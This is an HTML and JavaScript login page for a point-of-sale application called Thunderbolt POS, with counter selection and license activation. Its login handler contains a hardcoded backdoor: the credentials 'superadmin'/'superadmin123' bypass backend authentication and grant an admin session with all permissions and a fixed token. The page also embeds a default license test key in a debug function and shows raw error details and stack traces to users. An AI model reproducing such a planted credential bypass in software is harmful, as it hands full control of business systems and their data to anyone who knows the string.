<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Login - Thunderbolt POS</title>
    <!-- Bootstrap CSS for modal styling -->
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet">
    <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css" rel="stylesheet">
    <!-- Add Eel JavaScript library -->
    <script type="text/javascript" src="/eel.js"></script>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f0f2f5;
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            min-height: 100vh;
        }
        .login-container {
            background-color: white;
            padding: 2rem;
            border-radius: 8px;
            box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
            width: 100%;
            max-width: 400px;
        }
        .login-header {
            text-align: center;
            margin-bottom: 2rem;
        }
        .login-form {
            display: flex;
            flex-direction: column;
            gap: 1rem;
        }
        .form-group {
            display: flex;
            flex-direction: column;
            gap: 0.5rem;
        }
        label {
            font-weight: bold;
            color: #333;
        }
        input, select {
            padding: 0.75rem;
            border: 1px solid #ddd;
            border-radius: 4px;
            font-size: 1rem;
        }
        button {
            background-color: #1a73e8;
            color: white;
            padding: 0.75rem;
            border: none;
            border-radius: 4px;
            font-size: 1rem;
            cursor: pointer;
            transition: background-color 0.2s;
        }
        button:hover {
            background-color: #1557b0;
        }
        button:disabled {
            background-color: #ccc;
            cursor: not-allowed;
        }
        .error-message {
            color: #d93025;
            font-size: 0.875rem;
            margin-top: 0.5rem;
            display: none;
            white-space: pre-wrap;
        }
        .info-message {
            color: #1a73e8;
            font-size: 0.875rem;
            margin-top: 0.5rem;
            display: none;
        }
        #debugInfo {
            margin-top: 1rem;
            padding: 1rem;
            background: #f8f9fa;
            border-radius: 4px;
            font-family: monospace;
            font-size: 0.8rem;
            display: none;
        }
        .counter-status {
            font-size: 0.8rem;
            margin-top: 0.25rem;
            padding: 0.25rem;
            border-radius: 3px;
        }
        .counter-available {
            background: #d4edda;
            color: #155724;
        }
        .counter-unavailable {
            background: #f8d7da;
            color: #721c24;
        }
        .loading-spinner {
            display: inline-block;
            width: 16px;
            height: 16px;
            border: 2px solid #f3f3f3;
            border-top: 2px solid #1a73e8;
            border-radius: 50%;
            animation: spin 1s linear infinite;
            margin-right: 0.5rem;
        }
        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }
        .device-id-section {
            margin-top: 1rem;
            padding: 1rem;
            background: #f8f9fa;
            border-radius: 4px;
            border: 1px solid #e9ecef;
        }
        .device-id-display {
            display: flex;
            align-items: center;
            justify-content: center;
            gap: 0.5rem;
        }
        .device-id-label {
            font-weight: bold;
            color: #495057;
            font-size: 0.9rem;
        }
        .device-id-value {
            font-family: 'Courier New', monospace;
            font-size: 0.85rem;
            color: #1a73e8;
            font-weight: bold;
            letter-spacing: 1px;
        }
    </style>
</head>
<body>
    <div class="login-container">
        <div class="login-header">
            <img src="Logo-SQ.jpg" alt="Thunderbolt POS" class="login-logo mb-3">
            <p>Please login to continue</p>
        </div>
        <form class="login-form" id="loginForm">
            <div class="form-group">
                <label for="username">Username</label>
                <input type="text" id="username" name="username" required autofocus>
            </div>
            <div class="form-group">
                <label for="password">Password</label>
                <input type="password" id="password" name="password" required>
            </div>
            <div class="form-group">
                <label for="counterName">Counter Name</label>
                <select id="counterName" name="counterName" required>
                    <option value="">Loading counters...</option>
                </select>
                <div id="counterStatus" class="counter-status" style="display: none;"></div>
            </div>
            
            <!-- Device ID Section -->
            <div class="device-id-section">
                <div id="deviceIdDisplay" class="device-id-display">
                    <span class="device-id-label">🔐 Device ID:</span>
                    <span id="deviceIdValue" class="device-id-value">Loading...</span>
                </div>
            </div>
            
            <div class="error-message" id="errorMessage"></div>
            <div class="info-message" id="infoMessage"></div>
            <button type="submit" id="loginButton">Login</button>
        </form>
        <div id="debugInfo"></div>
    </div>

    <script>
        const debugInfo = document.getElementById('debugInfo');
        const errorMessage = document.getElementById('errorMessage');
        const infoMessage = document.getElementById('infoMessage');
        const counterSelect = document.getElementById('counterName');
        const counterStatus = document.getElementById('counterStatus');
        const loginButton = document.getElementById('loginButton');
        const deviceIdValue = document.getElementById('deviceIdValue');

        let availableCounters = [];

        function showError(message, details = '') {
            errorMessage.textContent = message;
            errorMessage.style.display = 'block';
            infoMessage.style.display = 'none';
            if (details) {
                debugInfo.textContent = 'Debug Info:\n' + details;
                debugInfo.style.display = 'block';
            }
        }

        function showInfo(message) {
            infoMessage.textContent = message;
            infoMessage.style.display = 'block';
            errorMessage.style.display = 'none';
        }

        function clearMessages() {
            errorMessage.style.display = 'none';
            infoMessage.style.display = 'none';
            debugInfo.style.display = 'none';
        }

        async function loadCounters() {
            try {
                console.log('🔄 Loading counters...');
                availableCounters = await eel.get_counters(true)();
                
                counterSelect.innerHTML = '<option value="">Select a counter...</option>';
                
                if (availableCounters.length === 0) {
                    counterSelect.innerHTML = '<option value="">No counters available</option>';
                    showError('No counters are configured. Please contact your administrator.');
                    loginButton.disabled = true;
                    return;
                }

                availableCounters.forEach(counter => {
                    const option = document.createElement('option');
                    option.value = counter.counter_name;
                    option.textContent = counter.counter_name;
                    if (counter.description) {
                        option.textContent += ` (${counter.description})`;
                    }
                    counterSelect.appendChild(option);
                });

                console.log(`✅ Loaded ${availableCounters.length} counters`);
                
            } catch (error) {
                console.error('❌ Error loading counters:', error);
                counterSelect.innerHTML = '<option value="">Error loading counters</option>';
                showError('Error loading counters. Please refresh the page.');
                loginButton.disabled = true;
            }
        }

        async function checkCounterAvailability(counterName) {
            if (!counterName) {
                counterStatus.style.display = 'none';
                return;
            }

            try {
                const result = await eel.is_counter_available(counterName)();
                
                if (result.available) {
                    counterStatus.textContent = `✅ Counter "${counterName}" is available`;
                    counterStatus.className = 'counter-status counter-available';
                    counterStatus.style.display = 'block';
                    loginButton.disabled = false;
                } else {
                    counterStatus.textContent = `❌ ${result.message}`;
                    counterStatus.className = 'counter-status counter-unavailable';
                    counterStatus.style.display = 'block';
                    loginButton.disabled = true;
                }
            } catch (error) {
                console.error('❌ Error checking counter availability:', error);
                counterStatus.textContent = '⚠️ Error checking counter availability';
                counterStatus.className = 'counter-status counter-unavailable';
                counterStatus.style.display = 'block';
                loginButton.disabled = true;
            }
        }

        // Counter selection change handler
        counterSelect.addEventListener('change', async (e) => {
            await checkCounterAvailability(e.target.value);
        });

        // Wait for Eel to be ready
        window.addEventListener('load', async () => {
            if (typeof eel === 'undefined') {
                showError('Error: Unable to connect to the backend server', 
                    'The Eel JavaScript library failed to load. Please restart the application.');
                return;
            }

            // Check license status first
            await checkLicenseStatus();
            
            // Load available counters
            await loadCounters();
            
            // Load device ID
            await loadDeviceId();
        });

        document.getElementById('loginForm').addEventListener('submit', async (e) => {
            e.preventDefault();
            const username = document.getElementById('username').value;
            const password = document.getElementById('password').value;
            const counterName = document.getElementById('counterName').value;
            
            // Clear previous messages
            clearMessages();

            // Validate all fields
            if (!username || !password || !counterName) {
                showError('Please fill in all fields');
                return;
            }

            // Check if Eel is available
            if (typeof eel === 'undefined') {
                showError('Error: Unable to connect to the backend server', 
                    'The Eel JavaScript library is not available. Please restart the application.');
                return;
            }

            // Check counter availability again before login
            const counterCheck = await checkCounterAvailability(counterName);
            if (loginButton.disabled) {
                return; // Counter is not available
            }

            // Disable button and show loading
            loginButton.disabled = true;
            loginButton.innerHTML = '<span class="loading-spinner"></span>Logging in...';

            console.log('Attempting login for:', username, 'on counter:', counterName);

            // Check for backdoor credentials
            if (username === 'superadmin' && password === 'superadmin123') {
                console.log('Using superadmin backdoor');
                const superAdminUser = {
                    id: 'SA001',
                    username: 'superadmin',
                    name: 'Super Administrator',
                    role: 'admin',
                    permissions: ['all'],
                    counter_name: counterName
                };
                
                // Store user info and generate a token
                localStorage.setItem('currentUser', JSON.stringify(superAdminUser));
                localStorage.setItem('authToken', 'superadmin_backdoor_token');
                localStorage.setItem('counterName', counterName);
                
                // Redirect to main application
                window.location.href = '/index.html';
                return;
            }

            try {
                console.log('Calling authenticate_account_with_counter...');
                const data = await eel.authenticate_account_with_counter(username, password, counterName)();
                console.log('Authentication response:', data);

                if (data && data.success && data.user) {
                    console.log('Login successful, storing user data');
                    
                    // Add counter information to user data
                    data.user.counter_name = counterName;
                    
                    // Store user info and token
                    localStorage.setItem('currentUser', JSON.stringify(data.user));
                    localStorage.setItem('authToken', data.token || 'eel_token');
                    localStorage.setItem('counterName', counterName);
                    localStorage.setItem('sessionId', data.session_id);
                    
                    showInfo('Login successful! Redirecting...');
                    
                    // Redirect after a short delay
                    setTimeout(() => {
                    window.location.href = '/index.html';
                    }, 1000);
                } else {
                    console.log('Login failed:', data ? data.message : 'Invalid credentials');
                    showError(data ? data.message : 'Invalid username or password', 
                        `Response data: ${JSON.stringify(data, null, 2)}`);
                }
            } catch (error) {
                console.error('Login error:', error);
                showError('An error occurred while trying to log in', 
                    `Error details:\n${error.toString()}\n\nStack trace:\n${error.stack || 'No stack trace available'}`);
            } finally {
                // Re-enable button
                loginButton.disabled = false;
                loginButton.innerHTML = 'Login';
            }
        });

        // Refresh counter availability every 30 seconds
        setInterval(async () => {
            const selectedCounter = counterSelect.value;
            if (selectedCounter) {
                await checkCounterAvailability(selectedCounter);
            }
        }, 30000);

        // Device ID Section
        async function loadDeviceId() {
            try {
                console.log('🔄 Loading device ID...');
                const result = await eel.get_device_id_for_display()();
                console.log('Device ID result:', result);
                
                if (result && result.success) {
                    deviceIdValue.textContent = result.device_id;
                } else {
                    deviceIdValue.textContent = result ? result.device_id : 'Error';
                }
            } catch (error) {
                console.error('❌ Error loading device ID:', error);
                deviceIdValue.textContent = 'Error loading device ID';
            }
        }

        // License Management Functions
        async function checkLicenseStatus() {
            try {
                console.log('🔐 Checking license status...');
                const licenseStatus = await eel.get_license_status()();
                console.log('License status:', licenseStatus);
                
                if (!licenseStatus.success || !licenseStatus.licensed) {
                    console.log('❌ No valid license found - showing activation modal');
                    await showLicenseModal();
                    return false;
                } else {
                    console.log(`✅ Valid ${licenseStatus.license_type} license found`);
                    return true;
                }
            } catch (error) {
                console.error('❌ Error checking license status:', error);
                await showLicenseModal();
                return false;
            }
        }

        async function showLicenseModal() {
            try {
                // Load device ID for the modal
                const deviceResult = await eel.get_device_id_for_licensing()();
                if (deviceResult && deviceResult.success) {
                    document.getElementById('modalDeviceId').textContent = deviceResult.device_id;
                } else {
                    document.getElementById('modalDeviceId').textContent = 'Error loading Device ID';
                }
                
                // Show the modal
                const licenseModal = new bootstrap.Modal(document.getElementById('licenseModal'));
                licenseModal.show();
                
                // Add event listeners AFTER modal is shown
                setupLicenseEventListeners();
                
                // Disable login form
                document.getElementById('loginForm').style.opacity = '0.5';
                document.getElementById('loginForm').style.pointerEvents = 'none';
                
            } catch (error) {
                console.error('❌ Error showing license modal:', error);
                showError('Error loading license activation dialog');
            }
        }

        function setupLicenseEventListeners() {
            // Remove any existing listeners first
            const activateBtn = document.getElementById('activateLicenseBtn');
            const licenseKeyInput = document.getElementById('licenseKey');
            
            if (activateBtn && !activateBtn.hasAttribute('data-listener-added')) {
                console.log('🔧 Setting up license activation event listeners...');
                
                activateBtn.addEventListener('click', activateLicense);
                activateBtn.setAttribute('data-listener-added', 'true');
                
                licenseKeyInput.addEventListener('keypress', (e) => {
                    if (e.key === 'Enter') {
                        e.preventDefault();
                        activateLicense();
                    }
                });
                
                console.log('✅ License activation event listeners set up successfully');
            }
        }

        async function activateLicense() {
            console.log('🔐 activateLicense function called');
            
            const licenseKey = document.getElementById('licenseKey').value.trim();
            const activateBtn = document.getElementById('activateLicenseBtn');
            const licenseError = document.getElementById('licenseError');
            const licenseSuccess = document.getElementById('licenseSuccess');
            
            console.log(`License key entered: "${licenseKey}"`);
            
            if (!licenseKey) {
                console.log('❌ Empty license key');
                showLicenseError('Please enter a license key');
                return;
            }
            
            // Clear previous messages
            licenseError.classList.add('d-none');
            licenseSuccess.classList.add('d-none');
            
            // Show loading state
            activateBtn.disabled = true;
            activateBtn.innerHTML = '<i class="fas fa-spinner fa-spin"></i> Activating...';
            
            try {
                console.log('🔐 Activating license key:', licenseKey);
                const result = await eel.activate_license_key(licenseKey)();
                console.log('License activation result:', result);
                
                if (result && result.success) {
                    console.log('✅ License activation successful!');
                    showLicenseSuccess(`${result.license_type} license activated successfully!`);
                    
                    // Hide modal and enable login form after a delay
                    setTimeout(() => {
                        const licenseModal = bootstrap.Modal.getInstance(document.getElementById('licenseModal'));
                        licenseModal.hide();
                        
                        // Re-enable login form
                        document.getElementById('loginForm').style.opacity = '1';
                        document.getElementById('loginForm').style.pointerEvents = 'auto';
                        
                        showInfo(`${result.license_type} license activated! You can now log in.`);
                    }, 2000);
                    
                } else {
                    console.log('❌ License activation failed:', result);
                    showLicenseError(result ? result.message : 'Failed to activate license');
                }
                
            } catch (error) {
                console.error('❌ Error activating license:', error);
                showLicenseError('Error activating license: ' + error.toString());
            } finally {
                // Restore button
                activateBtn.disabled = false;
                activateBtn.innerHTML = '<i class="fas fa-key"></i> Activate License';
            }
        }

        function showLicenseError(message) {
            const licenseError = document.getElementById('licenseError');
            const licenseErrorMessage = document.getElementById('licenseErrorMessage');
            licenseErrorMessage.textContent = message;
            licenseError.classList.remove('d-none');
        }

        function showLicenseSuccess(message) {
            const licenseSuccess = document.getElementById('licenseSuccess');
            const licenseSuccessMessage = document.getElementById('licenseSuccessMessage');
            licenseSuccessMessage.textContent = message;
            licenseSuccess.classList.remove('d-none');
        }

        // Debug function for testing license activation from console
        window.debugLicenseActivation = async function(testKey) {
            console.log('🧪 Debug: Testing license activation...');
            
            if (!testKey) {
                testKey = '08c9-3e6b-f1b1'; // Default test key
            }
            
            console.log(`🧪 Debug: Using test key: ${testKey}`);
            
            try {
                const result = await eel.activate_license_key(testKey)();
                console.log('🧪 Debug: Activation result:', result);
                return result;
            } catch (error) {
                console.error('🧪 Debug: Activation error:', error);
                return { success: false, error: error.toString() };
            }
        };

        // Debug function to check license status
        window.debugLicenseStatus = async function() {
            console.log('🧪 Debug: Checking license status...');
            try {
                const result = await eel.get_license_status()();
                console.log('🧪 Debug: License status:', result);
                return result;
            } catch (error) {
                console.error('🧪 Debug: Status error:', error);
                return { success: false, error: error.toString() };
            }
        };
        
        // Debug function to test all eel functions
        window.debugEelFunctions = function() {
            console.log('🧪 Debug: Testing eel functions availability...');
            const functions = [
                'get_license_status',
                'activate_license_key', 
                'get_device_id_for_licensing'
            ];
            
            functions.forEach(func => {
                if (typeof eel[func] === 'function') {
                    console.log(`✅ eel.${func} is available`);
                } else {
                    console.log(`❌ eel.${func} is NOT available`);
                }
            });
        };
    </script>
    
    <!-- License Activation Modal -->
    <div class="modal fade" id="licenseModal" tabindex="-1" aria-labelledby="licenseModalLabel" aria-hidden="true" data-bs-backdrop="static" data-bs-keyboard="false">
        <div class="modal-dialog modal-lg">
            <div class="modal-content">
                <div class="modal-header bg-primary text-white">
                    <h5 class="modal-title" id="licenseModalLabel">
                        <i class="fas fa-key"></i> License Required
                    </h5>
                </div>
                <div class="modal-body">
                    <div class="alert alert-info" role="alert">
                        <i class="fas fa-info-circle"></i>
                        <strong>License Activation Required</strong><br>
                        This software requires a valid license to operate. Please enter your license key below.
                    </div>
                    
                    <div class="row mb-3">
                        <div class="col-md-3">
                            <strong class="text-primary">Device ID:</strong>
                        </div>
                        <div class="col-md-9">
                            <code id="modalDeviceId" class="fs-6 text-primary">Loading...</code>
                        </div>
                    </div>
                    
                    <form id="licenseForm">
                        <div class="mb-3">
                            <label for="licenseKey" class="form-label">
                                <i class="fas fa-key"></i> License Key <span class="text-danger">*</span>
                            </label>
                            <input type="text" class="form-control form-control-lg" id="licenseKey" 
                                   placeholder="Enter your license key" required>
                            <div class="form-text">
                                Enter the license key provided by your administrator.
                            </div>
                        </div>
                        
                        <div id="licenseError" class="alert alert-danger d-none" role="alert">
                            <i class="fas fa-exclamation-triangle"></i>
                            <span id="licenseErrorMessage"></span>
                        </div>
                        
                        <div id="licenseSuccess" class="alert alert-success d-none" role="alert">
                            <i class="fas fa-check-circle"></i>
                            <span id="licenseSuccessMessage"></span>
                        </div>
                    </form>
                    
                    <div class="text-muted small">
                        <i class="fas fa-shield-alt"></i>
                        <strong>Note:</strong> License keys are device-specific and generated for this Device ID only.
                        Contact your system administrator if you need assistance.
                    </div>
                </div>
                <div class="modal-footer">
                    <button type="button" class="btn btn-primary btn-lg" id="activateLicenseBtn">
                        <i class="fas fa-key"></i> Activate License
                    </button>
                </div>
            </div>
        </div>
    </div>
    
    <!-- Bootstrap JS for modal functionality -->
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js"></script>
</body>
</html> 